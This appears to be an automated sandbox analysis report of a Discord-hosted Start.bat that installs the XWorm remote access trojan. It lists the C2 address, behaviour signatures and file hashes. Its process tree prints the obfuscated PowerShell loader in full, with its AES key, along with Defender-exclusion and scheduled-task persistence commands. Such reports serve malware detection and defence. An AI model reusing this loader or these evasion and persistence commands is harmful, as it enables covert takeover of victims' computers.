Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-2004-x64

10

Analysis

  • max time kernel
    40s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2024 16:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1303767638547234836/1304123529780002876/Start.bat?ex=672e3f2e&is=672cedae&hm=1a70960a938e07e2ddd8c72ff48adfc54297eacf01b0a8578112be7228913ce2&

Score
10/10
xwormdiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

here-thinking.gl.at.ply.gg:50161

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    WindowsSecurity.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1303767638547234836/1304123529780002876/Start.bat?ex=672e3f2e&is=672cedae&hm=1a70960a938e07e2ddd8c72ff48adfc54297eacf01b0a8578112be7228913ce2&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7fff571f46f8,0x7fff571f4708,0x7fff571f4718
      2⤵
        PID:2484
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
        2⤵
          PID:4216
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4700
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
          2⤵
            PID:3440
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
            2⤵
              PID:2752
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
              2⤵
                PID:1832
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
                2⤵
                  PID:2900
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                  2⤵
                    PID:1672
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
                    2⤵
                      PID:3044
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:908
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3480 /prefetch:8
                      2⤵
                        PID:1344
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                        2⤵
                          PID:3960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
                          2⤵
                            PID:4772
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                            2⤵
                              PID:3236
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                              2⤵
                                PID:2364
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2188,13853235275919415079,17744242769538683247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5828
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Start.bat" "
                                2⤵
                                  PID:4036
                                  • C:\Windows\system32\net.exe
                                    net file
                                    3⤵
                                      PID:1244
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 file
                                        4⤵
                                          PID:5312
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TufS8ZaurfoThZDbYbtxfcDOjlYN+imc+WoXaAY2vXo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mXwtv9w/Aq1VJSBIGOwyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ViBQI=New-Object System.IO.MemoryStream(,$param_var); $PHnzU=New-Object System.IO.MemoryStream; $ghPdm=New-Object System.IO.Compression.GZipStream($ViBQI, [IO.Compression.CompressionMode]::Decompress); $ghPdm.CopyTo($PHnzU); $ghPdm.Dispose(); $ViBQI.Dispose(); $PHnzU.Dispose(); $PHnzU.ToArray();}function execute_function($param_var,$param2_var){ $iekyy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HwyoV=$iekyy.EntryPoint; $HwyoV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Start.bat';$bwObL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Start.bat').Split([Environment]::NewLine);foreach ($oTJqN in $bwObL) { if ($oTJqN.StartsWith(':: ')) { $ASQjE=$oTJqN.Substring(3); break; }}$payloads_var=[string[]]$ASQjE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops startup file
                                        • Adds Run key to start application
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5968
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5696
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5492
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsSecurity.exe'
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5556
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:6120
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\Users\Admin\AppData\Local\WindowsSecurity.exe"
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2880
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:1936
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:4772
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault5ac54a09h3ce6h42a6hb576ha6a23f512dc4
                                        1⤵
                                          PID:5900
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff571f46f8,0x7fff571f4708,0x7fff571f4718
                                            2⤵
                                              PID:5976
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16509777816515924792,5992972198512686181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
                                              2⤵
                                                PID:4476
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,16509777816515924792,5992972198512686181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
                                                2⤵
                                                  PID:3116

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                Filesize

                                                152B

                                                MD5

                                                6960857d16aadfa79d36df8ebbf0e423

                                                SHA1

                                                e1db43bd478274366621a8c6497e270d46c6ed4f

                                                SHA256

                                                f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

                                                SHA512

                                                6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                Filesize

                                                152B

                                                MD5

                                                f426165d1e5f7df1b7a3758c306cd4ae

                                                SHA1

                                                59ef728fbbb5c4197600f61daec48556fec651c1

                                                SHA256

                                                b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

                                                SHA512

                                                8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                Filesize

                                                6KB

                                                MD5

                                                8d317c75689db53353abb4aeb4277467

                                                SHA1

                                                3e86038c356df756b8aee490bd2a9011753fe7af

                                                SHA256

                                                84089ea4e7d0ce13bd6cce7b5b7ebb56f9da2732d96fa244c5dfc9a50df2b45d

                                                SHA512

                                                c47b2a26c2acc6ab1815c16ca9f3eac37d6913221eabdad95b5d980396626692f2123e4e46716bc6dd686d74469c13afc10d9b06d6174e88ab2767d245f25f0d

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                Filesize

                                                5KB

                                                MD5

                                                610319bdf378bc1d038becdc1e8a6840

                                                SHA1

                                                efe8b0dbe4442490b8095192c143d5cae5f7f909

                                                SHA256

                                                406a73589a136664799b64cae533c0bfc321a5c9a61a0396eee52787f50257ab

                                                SHA512

                                                8b3ec1c5ccbedf5e1fcd79de9319d060655d4f9e23c5c9fe4571c70ec41a0565fcecdf87276d6c185ff87f6e92ebfd1a9d116d66f565debfaf075530554f1ac5

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                Filesize

                                                16B

                                                MD5

                                                6752a1d65b201c13b62ea44016eb221f

                                                SHA1

                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                SHA256

                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                SHA512

                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                4320d7852f6e681fee90caecfe1005a2

                                                SHA1

                                                2855cf7ef1e4f19f1410b53a807dd24c430c0df8

                                                SHA256

                                                b7d19ee4b8d7be54f5ced715726b98b0fcbabb814f9937ac1e36e86451ff61e1

                                                SHA512

                                                84784d9d89a76d610ee101b9546223cac39c13e45e6af904682f7c0d937b71dd094b7f9a4fd44b3fe792937ab0374551dcc3812ae53f191f45adc164a540876c

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                101705834e50bfad6cfacf1c6e3d058b

                                                SHA1

                                                4e5a9bc4de3be5d1683f4cde302297e41f29e380

                                                SHA256

                                                1f5923e23ce685cfc6d034ba54e6af56b3626fbd5a89b9a6f3064b327b48db5a

                                                SHA512

                                                8ead4836e3da94641e55d3d08005ac93963847cb57d4e64c46f07c70a915e55b7bfac4e201c9a1ec17bdff36a9defb7eae2577c20f043255edc0e961949dbd50

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                acdf7721b19bcedb0678c35ad2d9e5a4

                                                SHA1

                                                ba61efaa40dad81c46d13ae15ada4cde7d8aba43

                                                SHA256

                                                d633eefd29687b4b5982919704e7940820879c48aa9011171fd99abc9ff251c9

                                                SHA512

                                                2f6af3ec79ab55ed57c4b78b768b9c861f39e55b4ef5035808cfd71247ffd6d69e00064d247cc3207d3dfe7c99d94570a5ef3d24895675fc5fd0784b9cdc42aa

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                56cdc2f1da886f6544d5b8ad399aa55f

                                                SHA1

                                                dad1351879717a0b70e1b279cbaecf1e7d821c23

                                                SHA256

                                                649171489ce4c8f9ddc6d86484cc342851d9fe13f55fdd3cc41cf1ab3e1f9eb5

                                                SHA512

                                                6b68620bb85d711f90c29b09551eb9c0ad8cc49d692a781eac873cd77d3b5d68122f0dcf990eba1d8c15f4a72c5937a60a52b64a145cb42cb44d8107dd47a3a2

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                944B

                                                MD5

                                                62623d22bd9e037191765d5083ce16a3

                                                SHA1

                                                4a07da6872672f715a4780513d95ed8ddeefd259

                                                SHA256

                                                95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                SHA512

                                                9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                944B

                                                MD5

                                                76a688883aa4b5a19a77ca49099a78f6

                                                SHA1

                                                2ec59818deb7a7261f985314de47d0d655ce014b

                                                SHA256

                                                c6c0c86e4dd117e67e731873c508ad0b218982fa508d9fb766f50fb1e6540534

                                                SHA512

                                                e2c5d6dbf607be1b4143aa85a3262d8a7845ff8899ce66bf1f38d3c000fa3fa3bd7c1c851d2f7cc06c6d31a1ca46740382d462a7d89b96c6e5d255e299c8f594

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                944B

                                                MD5

                                                d66078cfc91eb0328389f2a488ad735e

                                                SHA1

                                                c532c251856d3220593e975fc9bac92bcb54e33a

                                                SHA256

                                                d03d6d2b24b2011d0a12b9956eaa7a1180b92e2243834f37424efad928ef54bc

                                                SHA512

                                                372dfc58d94ab8343f599175b0dc645b4fd7b9eadd36480ca78fc8c745198a0fc80b35bd040c52096fc53654c4815b93745ef515c1cf11bd8d821eb910c69cea

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cp5sa4of.fkh.ps1
                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                Download Submit

                                              • C:\Users\Admin\Downloads\Unconfirmed 643297.crdownload
                                                Filesize

                                                90KB

                                                MD5

                                                ed1976231141b98cbf7001c77ccdf957

                                                SHA1

                                                a3d66d2b03a65956734049653fca27c144609705

                                                SHA256

                                                d8c24140a467028c9ece7ab4eb5babacb624a21109795e9f3e5cc665690ca8b6

                                                SHA512

                                                d192bf835da1b5fceba8cec45bdcde91a4880db569003527b9948f165595fcf307470fc0692de3c8e8e2322e9efadee8204825648df370788f224b531bfc3531

                                                Download Submit

                                              • memory/5968-125-0x0000016063180000-0x0000016063198000-memory.dmp

                                                Filesize

                                                96KB

                                                Download

                                              • memory/5968-124-0x0000016063170000-0x0000016063182000-memory.dmp

                                                Filesize

                                                72KB

                                                Download

                                              • memory/5968-123-0x0000016062F30000-0x0000016062F38000-memory.dmp

                                                Filesize

                                                32KB

                                                Download

                                              • memory/5968-113-0x0000016062F40000-0x0000016062F62000-memory.dmp

                                                Filesize

                                                136KB

                                                Download